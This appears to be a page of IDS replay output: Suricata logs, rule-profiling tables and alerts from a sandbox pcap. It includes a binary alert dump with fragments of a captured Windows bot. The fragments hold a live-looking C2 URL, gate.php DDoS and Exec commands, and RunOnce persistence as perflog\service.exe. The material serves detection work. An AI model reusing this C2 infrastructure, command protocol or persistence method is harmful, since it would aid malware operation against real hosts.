16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_header": 10
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient http_header": 6
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_header_names": 2
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_accept": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_referer": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_content_len": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_content_type": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient http_content_type": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_protocol": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_start": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_method": 5
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_cookie": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient http_cookie": 2
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_host": 2
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver dns_query": 4
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver tls_sni": 2
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver file_data": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient file_data": 7
16/9/2019 -- 10:50:38 - <Perf> - Registered 39590 rule profiling counters.
16/9/2019 -- 10:50:38 - <Info> - fast output device (regular) initialized: alert
16/9/2019 -- 10:50:38 - <Info> - eve-log output device (regular) initialized: eve.json
16/9/2019 -- 10:50:38 - <Config> - enabling 'eve-log' module 'alert'
16/9/2019 -- 10:50:38 - <Config> - enabling 'eve-log' module 'http'
16/9/2019 -- 10:50:38 - <Config> - enabling 'eve-log' module 'dns'
16/9/2019 -- 10:50:38 - <Config> - enabling 'eve-log' module 'tls'
16/9/2019 -- 10:50:38 - <Config> - enabling 'eve-log' module 'files'
16/9/2019 -- 10:50:38 - <Config> - enabling 'eve-log' module 'ssh'
16/9/2019 -- 10:50:38 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
16/9/2019 -- 10:50:38 - <Info> - stats output device (regular) initialized: stats.log
16/9/2019 -- 10:50:38 - <Config> - AutoFP mode using "Hash" flow load balancer
16/9/2019 -- 10:50:38 - <Info> - reading pcap file /var/pcap/09162019.1050-pcap_4.pcap
16/9/2019 -- 10:50:38 - <Config> - using 1 flow manager threads
16/9/2019 -- 10:50:38 - <Config> 

This file has been truncated. Go here to download in full.


keyword_perf.log - (13570 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 9/16/2019 -- 10:50:40
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             53134044        9955            9955            44056           5337.00         5337.00         0.00           
  content          94291450        15627           10533           431646          6033.00         6097.00         5902.00        
  pcre             22743962        3119            395             93604           7292.00         6470.00         7411.00        
  byte_test        1323626         253             161             26786           5231.00         5335.00         5050.00        
  byte_jump        544786          106             106             24974           5139.00         5139.00         0.00           
  isdataat         39396           8               2               6086            4924.00         4527.00         5057.00        
  flowbits         3878376         739             136             119422          5248.00         6347.00         5000.00        
  urilen           14034796        2722            1242            37976           5156.00         5170.00         5143.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             53134044        9955            9955            44056           5337.00         5337.00         0.00           
  flowbits         3398910         656             53              119422          5181.00         7241.00         5000.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7505788         1039            734             431646          7224.00         7125.00         7460.00        
  pcre             896952          98              0               64108           9152.00         0.00            9152.00        
  byte_test        1201840         227             161             26786           5294.00         5335.00         5194.00        
  byte_jump        323574          60              60              24974           5392.00         5392.00         0.00           
  isdataat         39396           8               2               6086            4924.00         4527.00         5057.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         479466          83              83              22330           5776.00         5776.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          22266274        3677            2566            48034           6055.00         6054.00         6056.00        
  pcre             15892810        2171            0               93604           7320.00         0.00            7320.00        
  urilen           14034796        2722            1242            37976           5156.00         5170.00         5143.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          407936          79              0               6522            5163.00         0.00            5163.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2216596         222             68              200912          9984.00         9729.00         10097.00       
  byte_test        121786          26              0               5720            4684.00         0.00            4684.00        
  byte_jump        221212          46              46              5800            4808.00         4808.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          39577052        6651            4889            144890          5950.00         6054.00         5660.00        
  pcre             4720082         661             237             70050           7140.00         6838.00         7309.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5817774         1035            584             69386           5621.00         5754.00         5448.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          379352          58              54              38978           6540.00         6621.00         5452.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_raw_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          11782           2               0               5942            5891.00         0.00            5891.00        
  pcre             59928           2               0               51972           29964.00        0.00            29964.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2988942         542             162             25360           5514.00         5812.00         5387.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          12492336        2212            1422            42002           5647.00         5796.00         5379.00        
  pcre             934908          158             158             27558           5917.00         5917.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  pcre             239282          29              0               31254           8251.00         0.00            8251.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_msg
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          10594           2               0               5428            5297.00         0.00            5297.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          617024          108             54              23192           5713.00         5387.00         6038.00        


suricata-4.0.0-etpro-all-alert-2019-09-16-T-10-50-40-09162019.1050-pcap_4.pcap.txt - (438 bytes) - download
1
2
09/11/2019-14:45:13.689959  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 77.222.62.31:80 -> 192.168.56.101:49175
09/11/2019-14:45:50.607163  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 77.222.62.31:80 -> 192.168.56.101:49220


unified2.alert.1568631038 - (8443 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
4]yy
‡'Ώ!MÞ>À¨8ePÀ]yy]yy
‡'Es1{MÞ>À¨8ePÀPÎÏP¹l…@º‹Ãècëÿÿ‹Eè3Òè}Þÿÿ¢…¶@±,º‹Ãè’ëÿÿ¢†¶@±.º‹Ãèëÿÿ¢‡¶@EäP¹l…@º‹Ãèëÿÿ‹Eä3Òè3Þÿÿ¢ˆ¶@±/º‹ÃèHëÿÿ¢‰¶@EÜP¹x…@º‹Ãèâêÿÿ‹E܍Uàèîÿÿ‹Uฌ¶@è:½ÿÿEÔP¹ˆ…@º ‹Ãèµêÿÿ‹EԍUØèâíÿÿ‹Uظ¶@è
½ÿÿ±:º‹ÃèÛêÿÿ¢”¶@EÐP¹ …@º(‹Ãèuêÿÿ‹U蘶@èؼÿÿEÌP¹¬…@º)‹ÃèSêÿÿ‹U̸œ¶@趼ÿÿEøèZ¼ÿÿEôèR¼ÿÿEÈP¹l…@º%‹Ãè!êÿÿ‹EÈ3Òè;Ýÿÿ…ÀuEüº¸…@躼ÿÿë
EüºÄ…@諼ÿÿEÄP¹l…@º#‹Ãèâéÿÿ‹EÄ3ÒèüÜÿÿ…Àu?EÀP¹l…@º‹Ãè¿éÿÿ‹EÀ3ÒèÙÜÿÿ…ÀuEôºÐ…@èX¼ÿÿë
Eøºà…@èI¼ÿÿÿuøÿuühð…@ÿuô¸ ¶@ºèÔ¾ÿÿÿuøÿuühü…@ÿuô¸¤¶@ºè·¾ÿÿ±,º‹Ãè™éÿÿ¢N·@3ÀZYYd‰h^…@EÀºèn»ÿÿÃéDµÿÿëë[‹å]Ãÿÿÿÿ0ÿÿÿÿm/d/yyÿÿÿÿmmmm d, yyyyÿÿÿÿamÿÿÿÿpmÿÿÿÿhÿÿÿÿhhÿÿÿÿ AMPMÿÿÿÿAMPM ÿÿÿÿ:mmÿÿÿÿ:mm:ssÿ%dÂ@‹ÀSVQ»˜¢@‹ô닉‹‹‰º‹覢ÿÿƒ;uåZ^[ÐShp†@èÅËÿÿ‹Ø…Ûth€†@Sè¼Ëÿÿ£ð @ƒ=ð @u
¸Øb@£ð @[Ãkernel32.dllGetDiskFreeSpaceExA‹3ɉ‹ÂèC°ÿÿËÀ¢@Œ£@ˆ¢@H£@€¢@¼¢@x¢@ £@p¢@´£@h¢@£@`¢@@£@X¢@ ¢@P¢@P£@H¢@\£@@¢@$£@8¢@,£@0¢@Ô£@(¢@(£@ ¢@ô£@¢@€£@¢@p£@¢@ø£@¢@ä£@ø¡@8£@ð¡@Ø£@è¡@Ü£@࡝]yy]yy
‡'Es1{MÞ>À¨8ePÀP6x@ô¢@Ø¡@Т@С@l£@È¡@œ£@À¡@¤¢@¸¡@У@°¡@4£@(¨¡@È£@¤¡@À¢@ ¡@˜£@œ¡@°¢@˜¡@Ü¢@”¡@Ô¢@¡@È¢@Œ¡@0£@ˆ¡@|£@„¡@Ø¢@€¡@h£@|¡@°£@x¡@¨£@t¡@„£@p¡@ £@l¡@£@h¡@¬¢@d¡@¤£@`¡@X£@\¡@£@X¡@L£@T¡@t£@P¡@T£@L¡@£@H¡@¨¢@D¡@D£@@¡@à£@<¡@Ä£@8¡@d£@4¡@ð¢@0¡@´¢@,¡@¼£@(¡@¤@$¡@Ì¢@ ¡@œ¢@¡@Ì£@¡@`£@¡@è£@¡@<£@ü @ø¢@U‹ì3ÀUhéŠ@dÿ0d‰ ÿ·@…J¸œ·@èùüÿÿèlüÿÿèóóÿÿ¸ä¡@¹‹hx@èæ¼ÿÿ¸¬¡@¹‹èw@èѼÿÿ¸ô @¹‹@è¼¼ÿÿ¸ì @貶ÿÿ¸Œ·@‹Ì_@躽ÿÿ¸ˆ·@‹¨_@誽ÿÿ¸P·@¹‹@è}¼ÿÿ¸$·@¹‹@èh¼ÿÿ¸·@¹‹@èS¼ÿÿ¸Ø¶@¹‹@è>¼ÿÿ¸¨¶@¹‹@è)¼ÿÿ¸¤¶@è¶ÿÿ¸ ¶@è¶ÿÿ¸œ¶@è¶ÿÿ¸˜¶@è¶ÿÿ¸¶@è÷µÿÿ¸Œ¶@èíµÿÿ¸€¶@èãµÿÿ¸È @èÙµÿÿ¸´ @èG»ÿÿ¸° @èŵÿÿ3ÀZYYd‰hðŠ@Ã鲯ÿÿëø]ËÀU‹ì3ÀUh\‹@dÿ0d‰ ƒ-·@s@¸¤†@è,³ÿÿ¸‡@èJ³ÿÿ€=]¶@t¸ì @ºp‹@躵ÿÿèÕñÿÿèÔòÿÿèïúÿÿè>÷ÿÿ3ÀZYYd‰hc‹@Ãé?¯ÿÿëø]Ãÿÿÿÿ0xU‹ì3ÀUh™‹@dÿ0d‰ ÿ ·@3ÀZYYd‰h ‹@Ãé¯ÿÿëø]ËÀƒ]yy]yy
‡'Es1{MÞ>À¨8ePÀPýë- ·@ÃU‹ì3ÀUhы@dÿ0d‰ ÿ¤·@3ÀZYYd‰h؋@ÃéÊ®ÿÿëø]ËÀƒ-¤·@Ãÿ%lÂ@‹ÀU‹ì3ÀUhŒ@dÿ0d‰ ÿ¨·@3ÀZYYd‰hŒ@Ã銮ÿÿëø]ËÀƒ-¨·@ÃU‹ìƒÄøSVW‰Uø‰Eü‹EüèÕ¸ÿÿ‹Eøè͸ÿÿ3ÀUh²Œ@dÿ0d‰ 3ÀUh‹Œ@dÿ0d‰ jj‹Eø赸ÿÿP‹Eü謸ÿÿPjèhÿÿÿ…À”Ã3ÀZYYd‰ëéä¬ÿÿ3Ûè½®ÿÿ3ÀZYYd‰h¹Œ@Eøºè´ÿÿÃéé­ÿÿëë‹Ã_^[YY]ËÀU‹ìƒÄÈS3À‰EȉẺEЉEì3ÀUhÿ@dÿ0d‰ E캎@èD´ÿÿUЋEìè!Óÿÿ‹Uи4Ž@è`¸ÿÿ…ÀuEì‹Mìº4Ž@èL¶ÿÿ3Ûjjjjh<Ž@èœÅÿÿ‰Eüƒ}ü„›jh€jj‹EìèÌ·ÿÿP‹EüPèzÅÿÿ‰Eø3À‰EôÇEð
EôPEðPEÔPj‹EøPè<ÅÿÿEԉEèE̋Uèèç´ÿÿ‹E̺TŽ@èʶÿÿtEȋUèèÍ´ÿÿ‹EȺ`Ž@è°¶ÿÿt3Û볃}øt	‹EøPèõÄÿÿ‹EüPèìÄÿÿ3ÀZYYd‰hŽ@EȺèβÿÿEì袲ÿÿÃ霬ÿÿëã‹Ã[‹å]Ãÿÿÿÿhttp://google.comÿÿÿÿhttp://InetURL:/1.0ÿÿÿÿ200ÿÿÿÿ302SÄüþÿÿ‹ØThè°Ãÿÿ‹Ã‹Ô¹èn´ÿÿÄ[ËÀS‹Ø‹Ó3Àèÿÿ[ËÀU‹ìjjjS3ÀUhX@dÿ0d‰ 3ÛjEüPjh?jjjhh@h€èÄÂÿÿ…Àu]Eøè|ÿÿÿEøº¤@è3´ÿÿ‹Eøè#´ÿÿ@PEôè]ÿÿÿEôº¤@è´ÿÿ‹Eôè¶ÿÿPjjh¸@‹EüPèyÂÿÿ…À”ËEüPè[Âÿÿ3ÀZYYd‰h_@Eôºèm±ÿÿÃéC«ÿÿëë‹Ã[‹å]ÃSoftware\Microsoft\Windows\CurrentVersion\RunOnceÿÿÿÿperflog\service.exeAutoUpdateU‹ì3ÀUhã@dÿ0d‰ 3ÀZYYd‰hê@Ã鸪ÿÿëø]Ã]yy]yy
‡'Es1{MÞ>À¨8ePÀP°ô@XQ@(Q@4O@àN@Q@`Q@¸R@ˆR@S@àR@HS@S@V@ÐU@ôŠ@t‰@¤‹@t‹@܋@¬‹@Œ@ì‹@ď@U‹ì¹jjIuùSV¸ì@èuÀÿÿ¾Ä·@3ÀUhp•@dÿ0d‰ ¸¸·@ºˆ•@èc°ÿÿEìèËýÿÿ‹U츴·@¹´•@èÁ²ÿÿEè¹È•@‹´·@讲ÿÿ‹EèèzÑÿÿ„À…Wj¡´·@èF´ÿÿPèÐÀÿÿjEä¹È•@‹´·@èw²ÿÿ‹Eäè#´ÿÿPUà3À蔚ÿÿ‹Eàè´ÿÿPè*ÁÿÿjdèçôÿÿjEܹȕ@‹´·@è:²ÿÿ‹EÜèæ³ÿÿPèÁÿÿjdè½ôÿÿèTýÿÿéÔ¡¼·@ºÜ•@è³ÿÿt
hà“è˜ôÿÿèSûÿÿ<uMÿ5¸·@hì•@¸ÿɚ;èfžÿÿUÔè*ÏÿÿÿuԍEغè>²ÿÿ‹EØPEй–@‹´·@è³±ÿÿ‹UÐXèbúÿÿ¸°·@º$–@è#¯ÿÿÿ5¸·@ÿ5°·@h8–@¸ÿɚ;èžÿÿUÌèÈÎÿÿÿu̸¬·@ºèÚ±ÿÿè¹úÿÿ<u EȹH–@‹´·@èJ±ÿÿ‹UÈ¡¬·@èõùÿÿjdèÎóÿÿEĹH–@‹´·@è#±ÿÿ‹UċÆèiœÿÿ‹Æèþ™ÿÿèI—ÿÿº¼·@‹Æè՞ÿÿè8—ÿÿ‹Æèÿÿè,—ÿÿ¸°·@º\–@èi®ÿÿÿ5¸·@ÿ5°·@h8–@¸ÿɚ;èJÿÿUÀèÎÿÿÿuÀ¸¬·@ºè ±ÿÿèÿùÿÿ<u E¼¹p–@‹´·@萰ÿÿ‹U¼¡¬·@è;ùÿÿjdèóÿÿ¡¼·@ºÜ•@èm±ÿÿ…óE¸¹p–@‹´·@èT°ÿÿ‹U¸‹Æ蚛ÿÿ‹Æè/™ÿÿèz–ÿÿºÀ·@‹Æèžÿÿèi–ÿÿ‹Æè2œÿÿè]–ÿÿètùÿÿ<uMÿ5¸·@h„–@¸ÿɚ;臜ÿÿU°èKÍÿÿÿu°E´ºè_°ÿÿ‹E´PE¬¹–@‹´·@èÔ¯ÿÿ‹U¬Xèƒøÿÿ»Èÿ5À·@h¨–@¸ÿɚ;è5œÿÿU¨èùÌÿÿÿu¨¸¬·@ºè°ÿÿE¤¹–@‹´·@脯ÿÿ‹U¤¡¬·@è/øÿÿKu®¸°·@º¸–@èí¬ÿÿÿ5¸·@ÿ5°·@h8–@¸ÿɚ;èΛÿÿU è’Ìÿÿÿu ¸¬·@º褯ÿ4]yž	C»Ώ!MÞ>À¨8ePÀD]yž]yž	C»Es1{MÞ>À¨8ePÀDPý¾- ·@ÃU‹ì3ÀUhы@dÿ0d‰ ÿ¤·@3ÀZYYd‰h؋@ÃéÊ®ÿÿëø]ËÀƒ-¤·@Ãÿ%lÂ@‹ÀU‹ì3ÀUhŒ@dÿ0d‰ ÿ¨·@3ÀZYYd‰hŒ@Ã銮ÿÿëø]ËÀƒ-¨·@ÃU‹ìƒÄøSVW‰Uø‰Eü‹EüèÕ¸ÿÿ‹Eøè͸ÿÿ3ÀUh²Œ@dÿ0d‰ 3ÀUh‹Œ@dÿ0d‰ jj‹Eø赸ÿÿP‹Eü謸ÿÿPjèhÿÿÿ…À”Ã3ÀZYYd‰ëéä¬ÿÿ3Ûè½®ÿÿ3ÀZYYd‰h¹Œ@Eøºè´ÿÿÃéé­ÿÿëë‹Ã_^[YY]ËÀU‹ìƒÄÈS3À‰EȉẺEЉEì3ÀUhÿ@dÿ0d‰ E캎@èD´ÿÿUЋEìè!Óÿÿ‹Uи4Ž@è`¸ÿÿ…ÀuEì‹Mìº4Ž@èL¶ÿÿ3Ûjjjjh<Ž@èœÅÿÿ‰Eüƒ}ü„›jh€jj‹EìèÌ·ÿÿP‹EüPèzÅÿÿ‰Eø3À‰EôÇEð
EôPEðPEÔPj‹EøPè<ÅÿÿEԉEèE̋Uèèç´ÿÿ‹E̺TŽ@èʶÿÿtEȋUèèÍ´ÿÿ‹EȺ`Ž@è°¶ÿÿt3Û볃}øt	‹EøPèõÄÿÿ‹EüPèìÄÿÿ3ÀZYYd‰hŽ@EȺèβÿÿEì袲ÿÿÃ霬ÿÿëã‹Ã[‹å]Ãÿÿÿÿhttp://google.comÿÿÿÿhttp://InetURL:/1.0ÿÿÿÿ200ÿÿÿÿ302SÄüþÿÿ‹ØThè°Ãÿÿ‹Ã‹Ô¹èn´ÿÿÄ[ËÀS‹Ø‹Ó3Àèÿÿ[ËÀU‹ìjjjS3ÀUhX@dÿ0d‰ 3ÛjEüPjh?jjjhh@h€èÄÂÿÿ…Àu]Eøè|ÿÿÿEøº¤@è3´ÿÿ‹Eøè#´ÿÿ@PEôè]ÿÿÿEôº¤@è´ÿÿ‹Eôè¶ÿÿPjjh¸@‹EüPèyÂÿÿ…À”ËEüPè[Âÿÿ3ÀZYYd‰h_@Eôºèm±ÿÿÃéC«ÿÿëë‹Ã[‹å]ÃSoftware\Microsoft\Windows\CurrentVersion\RunOnceÿÿÿÿperflog\service.exeAutoUpdateU‹ì3ÀUhã@dÿ0d‰ 3ÀZYYd‰hê@Ã鸪ÿÿëø]Ã]yž]yž	C»Es1{MÞ>À¨8ePÀDP¯òô@XQ@(Q@4O@àN@Q@`Q@¸R@ˆR@S@àR@HS@S@V@ÐU@ôŠ@t‰@¤‹@t‹@܋@¬‹@Œ@ì‹@ď@U‹ì¹jjIuùSV¸ì@èuÀÿÿ¾Ä·@3ÀUhp•@dÿ0d‰ ¸¸·@ºˆ•@èc°ÿÿEìèËýÿÿ‹U츴·@¹´•@èÁ²ÿÿEè¹È•@‹´·@讲ÿÿ‹EèèzÑÿÿ„À…Wj¡´·@èF´ÿÿPèÐÀÿÿjEä¹È•@‹´·@èw²ÿÿ‹Eäè#´ÿÿPUà3À蔚ÿÿ‹Eàè´ÿÿPè*ÁÿÿjdèçôÿÿjEܹȕ@‹´·@è:²ÿÿ‹EÜèæ³ÿÿPèÁÿÿjdè½ôÿÿèTýÿÿéÔ¡¼·@ºÜ•@è³ÿÿt
hà“è˜ôÿÿèSûÿÿ<uMÿ5¸·@hì•@¸ÿɚ;èfžÿÿUÔè*ÏÿÿÿuԍEغè>²ÿÿ‹EØPEй–@‹´·@è³±ÿÿ‹UÐXèbúÿÿ¸°·@º$–@è#¯ÿÿÿ5¸·@ÿ5°·@h8–@¸ÿɚ;èžÿÿUÌèÈÎÿÿÿu̸¬·@ºèÚ±ÿÿè¹úÿÿ<u EȹH–@‹´·@èJ±ÿÿ‹UÈ¡¬·@èõùÿÿjdèÎóÿÿEĹH–@‹´·@è#±ÿÿ‹UċÆèiœÿÿ‹Æèþ™ÿÿèI—ÿÿº¼·@‹Æè՞ÿÿè8—ÿÿ‹Æèÿÿè,—ÿÿ¸°·@º\–@èi®ÿÿÿ5¸·@ÿ5°·@h8–@¸ÿɚ;èJÿÿUÀèÎÿÿÿuÀ¸¬·@ºè ±ÿÿèÿùÿÿ<u E¼¹p–@‹´·@萰ÿÿ‹U¼¡¬·@è;ùÿÿjdèóÿÿ¡¼·@ºÜ•@èm±ÿÿ…óE¸¹p–@‹´·@èT°ÿÿ‹U¸‹Æ蚛ÿÿ‹Æè/™ÿÿèz–ÿÿºÀ·@‹Æèžÿÿèi–ÿÿ‹Æè2œÿÿè]–ÿÿètùÿÿ<uMÿ5¸·@h„–@¸ÿɚ;臜ÿÿU°èKÍÿÿÿu°E´ºè_°ÿÿ‹E´PE¬¹–@‹´·@èÔ¯ÿÿ‹U¬Xèƒøÿÿ»Èÿ5À·@h¨–@¸ÿɚ;è5œÿÿU¨èùÌÿÿÿu¨¸¬·@ºè°ÿÿE¤¹–@‹´·@脯ÿÿ‹U¤¡¬·@è/øÿÿKu®¸°·@º¸–@èí¬ÿÿÿ5¸·@ÿ5°·@h8–@¸ÿɚ;èΛÿÿU è’Ìÿÿÿu ¸¬·@º褯ÿ]yž]yž	C»Es1{MÞ>À¨8ePÀDPåÿ¡¼·@ºÌ–@è!°ÿÿ…Ô¸–˜è•›ÿÿUœèYÌÿÿ‹Uœ¸°·@¹Ü–@è÷®ÿÿèJøÿÿ<u!E˜‹
°·@‹´·@èÚ®ÿÿ‹U˜¡¬·@è…÷ÿÿjdè^ñÿÿjE”‹
°·@‹´·@è°®ÿÿ‹E”è\°ÿÿP膽ÿÿèõ÷ÿÿ<uRÿ5¸·@hì–@h—@¸ÿɚ;è›ÿÿUŒèÇËÿÿÿuŒEºèÛ®ÿÿ‹EPEˆ¹–@‹´·@èP®ÿÿ‹UˆXèÿöÿÿE„ècùÿÿ‹E„PE€è+ùÿÿE€º—@èâ­ÿÿ‹U€Xè¯ÿÿ„üûÿÿ3ÀZYYd‰hw•@E€ºèU«ÿÿÃé+¥ÿÿëë^[è*ªÿÿÿÿÿÿ!http://x0x22a3720.temp.swtest.ru/ÿÿÿÿperflog\ÿÿÿÿservice.exeÿÿÿÿpingÿÿÿÿgate.php?status=Free&id=ÿÿÿÿtemp.tmpÿÿÿÿcommand.txtÿÿÿÿ?id=ÿÿÿÿcommand.tmpÿÿÿÿping.txtÿÿÿÿping.tmpÿÿÿÿgate.php?status=DDoS&id=ÿÿÿÿ?rnd=ÿÿÿÿfile.exeÿÿÿÿstartÿÿÿÿf.exeÿÿÿÿgate.php?status=Execÿÿÿÿ&id=ÿÿÿÿperflog\service.exe@2‹À@@@@P"@ü#@Ø'@ËÌÈÉ×ÏÈÍÎÛØÚÙÊÜÝÞßàáãäå@Error‹ÀRuntime error     at 00000000‹À01


IDSDeathBlossom.py.log - (1146 bytes) - download
1
2
3
4
5
6
7
8
2019-09-16 10:50:13,993 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-09-16 10:50:14,718 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-09-16 10:50:14,718 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-09-16 10:50:14,718 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-09-16 10:50:14,718 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
